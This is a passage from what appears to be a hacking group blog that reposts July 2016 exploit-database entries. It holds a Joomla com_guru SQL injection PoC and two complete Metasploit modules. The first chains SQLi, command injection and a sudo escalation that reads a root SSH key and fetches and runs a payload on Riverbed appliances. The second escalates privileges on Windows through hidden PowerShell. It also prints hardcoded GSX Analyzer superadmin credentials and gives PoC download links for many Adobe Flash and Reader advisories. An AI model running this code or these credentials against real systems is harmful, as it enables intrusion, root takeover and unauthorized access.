# Exploit Title: Joomla Guru Pro (com_guru) Component - SQL Injection
# Exploit Author: s0nk3y
# Date: 14/07/2016
# Vendor Homepage: https://www.ijoomla.com
# Software Link: https://www.ijoomla.com/component/digistore/products/47-joomla-add-ons/119-guru-pro/189?Itemid=189
# Category: webapps
# Version: All
# Tested on: Ubuntu 16.04
1. Description
Turn your knowledge into dollars! Sell Your Courses Today!
Guru, allows you to create online courses easily! We believe that everyone is an expert in something. If you know something that others don't, there is no better time to profit from it. You can create a course about your topic and start generating income.
2. Proof of Concept
Itemid Parameter Vulnerable To SQL Injection
com_guru&view=gurupcategs&layout=view&Itemid=[SQL Injection]&lang=en
Demo :
http://server/index.php?option=com_guru&view=gurupcategs&layout=view&Itemid=123%27&lang=en
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591790
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
require 'digest'
def initialize(info={})
super(update_info(info,
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
'Description' => %q{
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
configuration of the sudoers file can be abused to escalate privileges to root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2016",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
# Verifies existence of login SQLi
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_check
})
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Attempting log in to target appliance")
@sessid = do_login
print_status("Confirming command injection vulnerability")
test_cmd_inject
vprint_status('Ready to execute payload on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def get_nonce
# Function to get nonce from login page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php'),
})
if res && res.body && res.body.include?('nonce_')
html = res.get_html_document
nonce_field = html.at('input[@name="nonce"]')
nonce = nonce_field.attributes["value"]
else
fail_with(Failure::Unknown, 'Unable to get login nonce.')
end
# needed as login nonce is bounded to preauth SESSID cookie
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
return [nonce, sessid_cookie_preauth]
end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user
# Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER']
password = datastore['RIVERBED_PASSWORD']
usr_payload = generate_sqli_payload(username)
pwd_hash = Digest::SHA512.hexdigest(password)
pass_payload = generate_sqli_payload(pwd_hash)
uid = rand(999)
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_sqli
})
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_checkuser
})
if res && res.body && res.body.include?('session_id')
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
end
def generate_sqli_payload(input)
# Function to generate sqli payload for user/pass in expected format
payload = ''
input_array = input.strip.split('')
for index in 0..input_array.length-1
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
end
# Gets rid of the trailing '||' and newline
payload = payload[0..-3]
return payload
end
def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
end
def cmd_inject(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => cmd
})
end
# Deliver payload to appliance and make it run it
def primer
# Gets the autogenerated uri
payload_uri = get_uri
root_ssh_key_private = rand_text_alpha_lower(8)
binary_payload = rand_text_alpha_lower(8)
print_status("Privilege escalate to root and execute payload")
privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
cmd_inject(privesc_exec_cmd)
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
register_file_for_cleanup("/tmp/#{binary_payload}")
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 21 2016',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
# Tested on (32 bits):
# * Windows 7 SP1
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 8
# * Windows 2012
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]),
# How long until we DELETE file, we have a race condition here, so anything less than 60
# seconds might break
OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
], self.class)
end
def get_arch
arch = nil
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
arch
end
def check
os = sysinfo["OS"]
if os !~ /win/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
arch1 = get_arch
if check == Exploit::CheckCode::Safe
print_error("Target is not Windows")
return
elsif arch1 == nil
print_error("Architecture could not be determined.")
return
end
# Exploit PoC from 'b33f'
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path)
cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# payload formatted to fit dropped text file
payl = cmd_psh_payload(payload.encoded,payload.arch,{
encode_final_payload: false,
remove_comspec: true,
method: 'old'
})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd
@upfile = "#{path}\\#{@upfile}"
fd = session.fs.file.new(@upfile,"wb")
print_status("Writing payload file, #{@upfile}...")
fd.write(payl)
fd.close
psh_cmd = "IEX `$(gc #{@upfile})"
#lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b
ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
print_status('Compressing script contents...')
ms16_032_c = compress_script(ms16_032)
if ms16_032_c.size > 8100
print_error("Compressed size: #{ms16_032_c.size}")
error_msg = "Compressed size may cause command to exceed "
error_msg += "cmd.exe's 8kB character limit."
print_error(error_msg)
else
print_good("Compressed size: #{ms16_032_c.size}")
end
if datastore['DRY_RUN']
print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
return
end
print_status("Executing exploit script...")
cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
args = nil
begin
process = session.sys.process.execute(cmd, args, {
'Hidden' => true,
'Channelized' => false
})
rescue
print_error("An error occurred executing the script.")
end
end
def cleanup
sleep_t = datastore['TIMEOUT']
vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...")
sleep sleep_t
begin
rm_f(@upfile)
print_good("Cleaned up #{@upfile}")
rescue
print_error("There was an issue with cleanup of the powershell payload script.")
end
end
end
# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
# Date: 12-07-16
# Exploit Author: ndevnull
# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
# Software Link: http://www.gsx.com/download-the-trial-ma
# Version: 10.12, but also found in version 11
# Tested on: Windows Server 2008
# CERT : VR-241
# CVE :
1. Description
After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
The found credentials are:
Username: gsxlogin
Password: gsxpassword
2. Proof of Concept
A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
Code snippet:
-----------------
if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
-----------------
3. Solution:
Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘SceneAndFrameData’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip
###############################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4176
# COSIG-2016-20
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘TAG’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40105.zip
###############################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains ‘DefineSprite’ invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip
####################################################################################
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40101.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40100.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40098.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40099.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40097.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4204
# COSIG-2016-29
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40096.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
